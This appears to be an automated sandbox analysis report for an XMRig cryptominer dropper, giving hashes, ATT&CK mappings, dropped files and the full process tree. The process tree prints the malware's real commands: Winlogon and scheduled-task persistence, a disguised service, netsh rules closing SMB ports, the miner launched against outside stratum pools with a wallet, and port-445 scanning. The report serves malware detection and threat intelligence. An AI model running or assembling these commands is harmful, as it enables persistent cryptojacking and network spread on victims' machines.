xmrig | c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee

Analysis

max time kernel
151s
max time network
152s
platform
windows10_x64
resource
win10v20210408
submitted
07-05-2021 12:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

aa.exe
Size

28.1MB
MD5

8d9d7f5babe3ee15f2e93a4321fa45cf
SHA1

689d53ae66e75e0b5715c0d04a7cab20e5390790
SHA256

c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee
SHA512

12e23c78465c65364b00df5685ea8b4e7a3b4ab2832bed18311b535a54ed48d0bd07c8b72474b43dc95893c6dea2261abeaf41c20683c923f43c4562f1bf3c91

Score

10^/10

xmrig miner persistence

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

spmjgd.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "Explorer.exe C:\\Windows\\JEkAx\\spmjgd.exe"	spmjgd.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
miner

XMRig Miner Payload 4 IoCs

miner

Processes:

resource	yara_rule
C:\Windows\JEkAx\spmjgd.exe	xmrig
C:\Windows\JEkAx\spmjgd.exe	xmrig
C:\Windows\JEkAx\HW.exe	xmrig
behavioral2/memory/3052-161-0x0000000000400000-0x0000000000B4B000-memory.dmp	xmrig

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Executes dropped EXE 4 IoCs

Processes:

spmjgd.exeHW.exesvchost.exesvchost.exe

pid process

348 spmjgd.exe
3052 HW.exe
3588 svchost.exe
184 svchost.exe

Drops file in Windows directory 64 IoCs

Processes:

spmjgd.exesvchost.exeaa.exe

description	ioc	process
File created	C:\Windows\JEkAx\pcla-0.dll	spmjgd.exe
File created	C:\Windows\JEkAx\pcre-0.dll	spmjgd.exe
File created	C:\Windows\JEkAx\riar-2.dll	spmjgd.exe
File created	C:\Windows\JEkAx\tucl-1.dll	spmjgd.exe
File created	C:\Windows\JEkAx\svchost.exe	spmjgd.exe
File created	C:\Windows\JEkAx\chrome..exe	spmjgd.exe
File created	C:\Windows\JEkAx\exma.dll	spmjgd.exe
File created	C:\Windows\JEkAx\pcreposix-0.dll	spmjgd.exe
File created	C:\Windows\JEkAx\tibe.dll	spmjgd.exe
File created	C:\Windows\JEkAx\coli-0.dll	spmjgd.exe
File created	C:\Windows\JEkAx\etchCore-0.x64.dll	spmjgd.exe
File created	C:\Windows\JEkAx\eteb-2.dll	spmjgd.exe
File created	C:\Windows\JEkAx\exma-1.dll	spmjgd.exe
File created	C:\Windows\JEkAx\tibe-1.dll	spmjgd.exe
File created	C:\Windows\JEkAx\ip.dll	spmjgd.exe
File created	C:\Windows\JEkAx\Cstr.fb	spmjgd.exe
File created	C:\Windows\JEkAx\Cstr.xml	spmjgd.exe
File created	C:\Windows\JEkAx\cnli-0.dll	spmjgd.exe
File created	C:\Windows\JEkAx\tibe-2.dll	spmjgd.exe
File created	C:\Windows\JEkAx\chrome..xml	spmjgd.exe
File created	C:\Windows\JEkAx\posh-0.dll	spmjgd.exe
File created	C:\Windows\JEkAx\TFf	spmjgd.exe
File created	C:\Windows\JEkAx\adfw-2.dll	spmjgd.exe
File created	C:\Windows\JEkAx\etch-0.dll	spmjgd.exe
File created	C:\Windows\JEkAx\libxml2.dll	spmjgd.exe
File created	C:\Windows\JEkAx\trfo-2.dll	spmjgd.exe
File created	C:\Windows\JEkAx\tucl.dll	spmjgd.exe
File created	C:\Windows\JEkAx\xdvl-0.dll	spmjgd.exe
File opened for modification	C:\Windows\JEkAx\Result.txt	svchost.exe
File created	C:\Windows\JEkAx\dmgd-1.dll	spmjgd.exe
File created	C:\Windows\JEkAx\libeay32.dll	spmjgd.exe
File created	C:\Windows\JEkAx\riar.dll	spmjgd.exe
File created	C:\Windows\JEkAx\zlib1.dll	spmjgd.exe
File opened for modification	C:\Windows\JEkAx\s.bat	spmjgd.exe
File created	C:\Windows\JEkAx\tscl.html	aa.exe
File created	C:\Windows\JEkAx\spmjgd.exe	aa.exe
File created	C:\Windows\JEkAx\etchCore-0.x86.dll	spmjgd.exe
File created	C:\Windows\JEkAx\HW.exe	spmjgd.exe
File created	C:\Windows\IME\tps.exe	aa.exe
File created	C:\Windows\boy.exe	aa.exe
File created	C:\Windows\JEkAx\chrome..fb	spmjgd.exe
File created	C:\Windows\JEkAx\adfw.dll	spmjgd.exe
File created	C:\Windows\JEkAx\trch.dll	spmjgd.exe
File created	C:\Windows\JEkAx\trch-1.dll	spmjgd.exe
File created	C:\Windows\JEkAx\trfo.dll	spmjgd.exe
File created	C:\Windows\JEkAx\ssleay32.dll	spmjgd.exe
File created	C:\Windows\JEkAx\zibe.dll	spmjgd.exe
File created	C:\Windows\JEkAx\s.bat	spmjgd.exe
File created	C:\Windows\end.bat	spmjgd.exe
File created	C:\Windows\JEkAx\dmgd-4.dll	spmjgd.exe
File opened for modification	C:\Windows\JEkAx\tscl.html	spmjgd.exe
File created	C:\Windows\JEkAx\etebCore-2.x64.dll	spmjgd.exe
File created	C:\Windows\JEkAx\etebCore-2.x86.dll	spmjgd.exe
File created	C:\Windows\JEkAx\libiconv-2.dll	spmjgd.exe
File created	C:\Windows\JEkAx\posh.dll	spmjgd.exe
File created	C:\Windows\JEkAx\ucl.dll	spmjgd.exe
File created	C:\Windows\JEkAx\libcurl.dll	spmjgd.exe
File created	C:\Windows\JEkAx\trch-0.dll	spmjgd.exe
File created	C:\Windows\JEkAx\trfo-0.dll	spmjgd.exe
File created	C:\Windows\JEkAx\WinRing0x64.sys	spmjgd.exe
File opened for modification	C:\Windows\end.bat	spmjgd.exe
File created	C:\Windows\JEkAx\qdx.bat	spmjgd.exe
File created	C:\Windows\JEkAx\cnli-1.dll	spmjgd.exe
File created	C:\Windows\JEkAx\Cstr.exe	spmjgd.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2256 schtasks.exe

pid	process
2256	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

spmjgd.exe

pid	process
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe
348	spmjgd.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

HW.exe

description pid process

Token: SeLockMemoryPrivilege 3052 HW.exe
Token: SeLockMemoryPrivilege 3052 HW.exe
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

aa.exespmjgd.exe

pid process

624 aa.exe
624 aa.exe
348 spmjgd.exe
348 spmjgd.exe

description	pid	process
Token: SeLockMemoryPrivilege	3052	HW.exe
Token: SeLockMemoryPrivilege	3052	HW.exe

pid	process
624	aa.exe
624	aa.exe
348	spmjgd.exe
348	spmjgd.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

aa.exespmjgd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 624 wrote to memory of 348	624	aa.exe	spmjgd.exe
PID 624 wrote to memory of 348	624	aa.exe	spmjgd.exe
PID 624 wrote to memory of 348	624	aa.exe	spmjgd.exe
PID 624 wrote to memory of 3708	624	aa.exe	cmd.exe
PID 624 wrote to memory of 3708	624	aa.exe	cmd.exe
PID 624 wrote to memory of 3708	624	aa.exe	cmd.exe
PID 348 wrote to memory of 2964	348	spmjgd.exe	cmd.exe
PID 348 wrote to memory of 2964	348	spmjgd.exe	cmd.exe
PID 348 wrote to memory of 2964	348	spmjgd.exe	cmd.exe
PID 2964 wrote to memory of 2292	2964	cmd.exe	netsh.exe
PID 2964 wrote to memory of 2292	2964	cmd.exe	netsh.exe
PID 2964 wrote to memory of 2292	2964	cmd.exe	netsh.exe
PID 2964 wrote to memory of 2800	2964	cmd.exe	netsh.exe
PID 2964 wrote to memory of 2800	2964	cmd.exe	netsh.exe
PID 2964 wrote to memory of 2800	2964	cmd.exe	netsh.exe
PID 2964 wrote to memory of 3600	2964	cmd.exe	netsh.exe
PID 2964 wrote to memory of 3600	2964	cmd.exe	netsh.exe
PID 2964 wrote to memory of 3600	2964	cmd.exe	netsh.exe
PID 2964 wrote to memory of 3732	2964	cmd.exe	netsh.exe
PID 2964 wrote to memory of 3732	2964	cmd.exe	netsh.exe
PID 2964 wrote to memory of 3732	2964	cmd.exe	netsh.exe
PID 2964 wrote to memory of 840	2964	cmd.exe	netsh.exe
PID 2964 wrote to memory of 840	2964	cmd.exe	netsh.exe
PID 2964 wrote to memory of 840	2964	cmd.exe	netsh.exe
PID 2964 wrote to memory of 844	2964	cmd.exe	netsh.exe
PID 2964 wrote to memory of 844	2964	cmd.exe	netsh.exe
PID 2964 wrote to memory of 844	2964	cmd.exe	netsh.exe
PID 2964 wrote to memory of 3984	2964	cmd.exe	netsh.exe
PID 2964 wrote to memory of 3984	2964	cmd.exe	netsh.exe
PID 2964 wrote to memory of 3984	2964	cmd.exe	netsh.exe
PID 2964 wrote to memory of 620	2964	cmd.exe	netsh.exe
PID 2964 wrote to memory of 620	2964	cmd.exe	netsh.exe
PID 2964 wrote to memory of 620	2964	cmd.exe	netsh.exe
PID 2964 wrote to memory of 2304	2964	cmd.exe	netsh.exe
PID 2964 wrote to memory of 2304	2964	cmd.exe	netsh.exe
PID 2964 wrote to memory of 2304	2964	cmd.exe	netsh.exe
PID 2964 wrote to memory of 3580	2964	cmd.exe	netsh.exe
PID 2964 wrote to memory of 3580	2964	cmd.exe	netsh.exe
PID 2964 wrote to memory of 3580	2964	cmd.exe	netsh.exe
PID 348 wrote to memory of 2172	348	spmjgd.exe	cmd.exe
PID 348 wrote to memory of 2172	348	spmjgd.exe	cmd.exe
PID 348 wrote to memory of 2172	348	spmjgd.exe	cmd.exe
PID 348 wrote to memory of 2300	348	spmjgd.exe	cmd.exe
PID 348 wrote to memory of 2300	348	spmjgd.exe	cmd.exe
PID 348 wrote to memory of 2300	348	spmjgd.exe	cmd.exe
PID 2172 wrote to memory of 3592	2172	cmd.exe	netsh.exe
PID 2172 wrote to memory of 3592	2172	cmd.exe	netsh.exe
PID 2172 wrote to memory of 3592	2172	cmd.exe	netsh.exe
PID 2300 wrote to memory of 3600	2300	cmd.exe	netsh.exe
PID 2300 wrote to memory of 3600	2300	cmd.exe	netsh.exe
PID 2300 wrote to memory of 3600	2300	cmd.exe	netsh.exe
PID 2172 wrote to memory of 3912	2172	cmd.exe	netsh.exe
PID 2172 wrote to memory of 3912	2172	cmd.exe	netsh.exe
PID 2172 wrote to memory of 3912	2172	cmd.exe	netsh.exe
PID 2172 wrote to memory of 3676	2172	cmd.exe	netsh.exe
PID 2172 wrote to memory of 3676	2172	cmd.exe	netsh.exe
PID 2172 wrote to memory of 3676	2172	cmd.exe	netsh.exe
PID 2300 wrote to memory of 3924	2300	cmd.exe	netsh.exe
PID 2300 wrote to memory of 3924	2300	cmd.exe	netsh.exe
PID 2300 wrote to memory of 3924	2300	cmd.exe	netsh.exe
PID 2300 wrote to memory of 2256	2300	cmd.exe	netsh.exe
PID 2300 wrote to memory of 2256	2300	cmd.exe	netsh.exe
PID 2300 wrote to memory of 2256	2300	cmd.exe	netsh.exe
PID 2172 wrote to memory of 408	2172	cmd.exe	netsh.exe

C:\Users\Admin\AppData\Local\Temp\aa.exe
"C:\Users\Admin\AppData\Local\Temp\aa.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:624

C:\Windows\JEkAx\spmjgd.exe
C:\Windows\JEkAx\spmjgd.exe
2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:348

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\end.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:2964

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=ipsec_ply
4⤵
PID:2292

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=deny_pt
4⤵
PID:2800

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=allow_pt
4⤵
PID:3600

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP
4⤵
PID:3732

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP
4⤵
PID:840

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=deny action=block
4⤵
PID:844

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=allow action=negotiate
4⤵
PID:3984

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny
4⤵
PID:620

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"
4⤵
PID:2304

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=ipsec_ply assign=y
4⤵
PID:3580

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\end.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:2172

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=ipsec_ply
4⤵
PID:3592

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=deny_pt
4⤵
PID:3912

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=allow_pt
4⤵
PID:3676

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP
4⤵
PID:408

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP
4⤵
PID:1824

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=deny action=block
4⤵
PID:1628

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=allow action=negotiate
4⤵
PID:2104

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny
4⤵
PID:2760

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"
4⤵
PID:620

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=ipsec_ply assign=y
4⤵
PID:8

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\end.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:2300

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=ipsec_ply
4⤵
PID:3600

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=deny_pt
4⤵
PID:3924

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=allow_pt
4⤵
PID:2256

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP
4⤵
PID:2304

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP
4⤵
PID:2668

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=deny action=block
4⤵
PID:4000

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=allow action=negotiate
4⤵
PID:844

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny
4⤵
PID:2240

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"
4⤵
PID:184

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=ipsec_ply assign=y
4⤵
PID:1908

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\end.bat" "
3⤵
PID:2088

C:\Windows\SysWOW64\sc.exe
sc.exe Create "Application Layre Gateway Saervice" type= own type= interact start= demand DisplayName= "Can not be deledted" binPath= "cmd.exe /c start "C:\Windows\boy.exe"
3⤵
PID:4052

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\JEkAx\qdx.bat" "
3⤵
PID:1148

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /TN "\Microsoft\Windows\UPnP\Services" /RU SYSTEM /TR "C:\Windows\JEkAx\spmjgd.exe" /SC ONSTART
4⤵
- Creates scheduled task(s)
PID:2256

C:\Windows\JEkAx\HW.exe
"C:\Windows\JEkAx\HW.exe" -o stratum+tcp://dns.monerogb.com:6502 -o stratum+tcp://note.monerogb.com:8666 -o stratum+tcp://wk.sdffdasdfsdfaczxfwd53.org:5555 -u 44FaSvDWdKAB2R3n1XUZnjavNWwXEvyixVP8FhmccbNC6TGuCs4R937YWuoewbbSmMEsEJuYzqUwucVHhW73DwXo4ttSdNS -p x -k --donate-level=1
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3052

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\JEkAx\s.bat" "
3⤵
PID:628

C:\Windows\JEkAx\svchost.exe
svchost.exe syn 10.10.0.0 10.10.255.255 445 /save
4⤵
- Executes dropped EXE
PID:3588

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\JEkAx\s.bat" "
3⤵
PID:1124

C:\Windows\JEkAx\svchost.exe
svchost.exe tcp 10.10.0.0 10.10.255.255 445 450 /save
4⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:184

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\aa.exe"
2⤵
PID:3708

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Winlogon Helper DLL

T1004

New Service

T1050

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\JEkAx\HW.exe
MD5
8460b86a434521fe122230467dffc2a5

SHA1
f7bd0696c9201d5270cb75deb82895a85a5298a2

SHA256
812a448e4023b2b7b52dffe30e72b77b96b4f334263e1b0f2daad8e33a68143d

SHA512
fb6504aed5c99010faa00332eecdf2916393490b79b8819a1e338238fd0f21e7255550e3155fc0efbe2295858df84ffe1f703eaf9ffdd824406f80d2c7fe58dc

Download Submit
C:\Windows\JEkAx\qdx.bat
MD5
bb65b48991cff890a18183e95985117b

SHA1
386f006b1e400bdc3c0993ce988880e2dbf0bc67

SHA256
37da421f46c751ad1cd5b95bf9b87a8b45f02c7fe611f30c5042fd279b384bc5

SHA512
4c996041f7ba392fea71030096837d1950fbe093e80e531f9bba5a92ad869acec31e81e4532037b843c3ac11da156fb1e7f4ae86278f9397222a7ca3533d5dc1

Download Submit
C:\Windows\JEkAx\s.bat
MD5
6b695370f0a67101c00adc502c38497d

SHA1
3d0e2001771d6e66ee5babe44851fdd0ae4f9368

SHA256
2bcbdea44bc635c11b839ce12091dede30cf7b0f7b747241268dac4d543710c0

SHA512
54c17014864eb117292320e59305919356db3e6a0c42bff918a987f70b8a0036530a7e581eff19ed315b9ac95cdd3a439c27e8fc47cc485e5c3ccbb0b1370ada

Download Submit
C:\Windows\JEkAx\s.bat
MD5
7b3117aa38e0070cb934b5494d28bf8f

SHA1
0f13e6b970b67ccf59715c648b1c511be5b5507a

SHA256
a6eb67794241877255de8afaac418794cb3ec37f144f31d0f1a4e4375f4647e7

SHA512
e93ab0b124e30c60582c0f373e405d1e18e595b8637cce1313a0ed0791fdbf4b51a93dd2236daca0055034ea2fbc8945d981017e04cf1283b16bb0e368b7221c

Download Submit
C:\Windows\JEkAx\spmjgd.exe
MD5
8d9d7f5babe3ee15f2e93a4321fa45cf

SHA1
689d53ae66e75e0b5715c0d04a7cab20e5390790

SHA256
c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee

SHA512
12e23c78465c65364b00df5685ea8b4e7a3b4ab2832bed18311b535a54ed48d0bd07c8b72474b43dc95893c6dea2261abeaf41c20683c923f43c4562f1bf3c91

Download Submit
C:\Windows\JEkAx\spmjgd.exe
MD5
8d9d7f5babe3ee15f2e93a4321fa45cf

SHA1
689d53ae66e75e0b5715c0d04a7cab20e5390790

SHA256
c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee

SHA512
12e23c78465c65364b00df5685ea8b4e7a3b4ab2832bed18311b535a54ed48d0bd07c8b72474b43dc95893c6dea2261abeaf41c20683c923f43c4562f1bf3c91

Download Submit
C:\Windows\JEkAx\svchost.exe
MD5
c097fd043d3cbabcada0878505c7afa5

SHA1
966a60028a3a24268c049ffadbe1a07b83de24ce

SHA256
1328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc

SHA512
0837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0

Download Submit
C:\Windows\JEkAx\svchost.exe
MD5
c097fd043d3cbabcada0878505c7afa5

SHA1
966a60028a3a24268c049ffadbe1a07b83de24ce

SHA256
1328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc

SHA512
0837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0

Download Submit
C:\Windows\JEkAx\svchost.exe
MD5
c097fd043d3cbabcada0878505c7afa5

SHA1
966a60028a3a24268c049ffadbe1a07b83de24ce

SHA256
1328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc

SHA512
0837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0

Download Submit
C:\Windows\JEkAx\tscl.html
MD5
41f245fd82ec901eb2eea12ea69f5816

SHA1
2a9440c8f99f9f614953f0be6e0d28c0e7aa41cb

SHA256
e069676c3c9eb15005175e3e9ab758e43b9894b07bb6c16e2e5db80db97dcec8

SHA512
809ce123b499d79c89988eda91cbe6f8552b0cc524e61359c6b9f9287a2dcbd4b198653d0bf758e11e86ead671a0225c6369461d8a86a6cb9980da0091c51252

Download Submit
C:\Windows\end.bat
MD5
c017d5f762ae5d67efb7d099b53cca58

SHA1
ab7f8553de7614251d76ce54aaee52f1a35e7ae6

SHA256
d8b897a896d21dfea7d901a57aa9cb5aa17a6bf02db1570a7d856680e3b3847b

SHA512
856dc8f6e94b1211ac84505e1e3350fda32d43583f9ec2e12fa7821c68376278220921cd2bffa9b562d6b0ed09f3dc9f674d830c7475e3d39def48e41563af78

Download Submit
C:\Windows\end.bat
MD5
c017d5f762ae5d67efb7d099b53cca58

SHA1
ab7f8553de7614251d76ce54aaee52f1a35e7ae6

SHA256
d8b897a896d21dfea7d901a57aa9cb5aa17a6bf02db1570a7d856680e3b3847b

SHA512
856dc8f6e94b1211ac84505e1e3350fda32d43583f9ec2e12fa7821c68376278220921cd2bffa9b562d6b0ed09f3dc9f674d830c7475e3d39def48e41563af78

Download Submit
memory/8-150-0x0000000000000000-mapping.dmp

Download
memory/184-151-0x0000000000000000-mapping.dmp

Download
memory/184-169-0x0000000000000000-mapping.dmp

Download
memory/348-114-0x0000000000000000-mapping.dmp

Download
memory/408-139-0x0000000000000000-mapping.dmp

Download
memory/620-148-0x0000000000000000-mapping.dmp

Download
memory/620-127-0x0000000000000000-mapping.dmp

Download
memory/628-162-0x0000000000000000-mapping.dmp

Download
memory/840-124-0x0000000000000000-mapping.dmp

Download
memory/844-125-0x0000000000000000-mapping.dmp

Download
memory/844-147-0x0000000000000000-mapping.dmp

Download
memory/1124-167-0x0000000000000000-mapping.dmp

Download
memory/1148-155-0x0000000000000000-mapping.dmp

Download
memory/1628-143-0x0000000000000000-mapping.dmp

Download
memory/1824-141-0x0000000000000000-mapping.dmp

Download
memory/1908-152-0x0000000000000000-mapping.dmp

Download
memory/2088-153-0x0000000000000000-mapping.dmp

Download
memory/2104-145-0x0000000000000000-mapping.dmp

Download
memory/2172-130-0x0000000000000000-mapping.dmp

Download
memory/2240-149-0x0000000000000000-mapping.dmp

Download
memory/2256-157-0x0000000000000000-mapping.dmp

Download
memory/2256-138-0x0000000000000000-mapping.dmp

Download
memory/2292-120-0x0000000000000000-mapping.dmp

Download
memory/2300-131-0x0000000000000000-mapping.dmp

Download
memory/2304-128-0x0000000000000000-mapping.dmp

Download
memory/2304-140-0x0000000000000000-mapping.dmp

Download
memory/2668-142-0x0000000000000000-mapping.dmp

Download
memory/2760-146-0x0000000000000000-mapping.dmp

Download
memory/2800-121-0x0000000000000000-mapping.dmp

Download
memory/2964-118-0x0000000000000000-mapping.dmp

Download
memory/3052-161-0x0000000000400000-0x0000000000B4B000-memory.dmp

Filesize
7.3MB

Download
memory/3052-159-0x0000000000000000-mapping.dmp

Download
memory/3580-129-0x0000000000000000-mapping.dmp

Download
memory/3588-164-0x0000000000000000-mapping.dmp

Download
memory/3592-133-0x0000000000000000-mapping.dmp

Download
memory/3600-134-0x0000000000000000-mapping.dmp

Download
memory/3600-122-0x0000000000000000-mapping.dmp

Download
memory/3676-136-0x0000000000000000-mapping.dmp

Download
memory/3708-117-0x0000000000000000-mapping.dmp

Download
memory/3732-123-0x0000000000000000-mapping.dmp

Download
memory/3912-135-0x0000000000000000-mapping.dmp

Download
memory/3924-137-0x0000000000000000-mapping.dmp

Download
memory/3984-126-0x0000000000000000-mapping.dmp

Download
memory/4000-144-0x0000000000000000-mapping.dmp

Download
memory/4052-154-0x0000000000000000-mapping.dmp

Download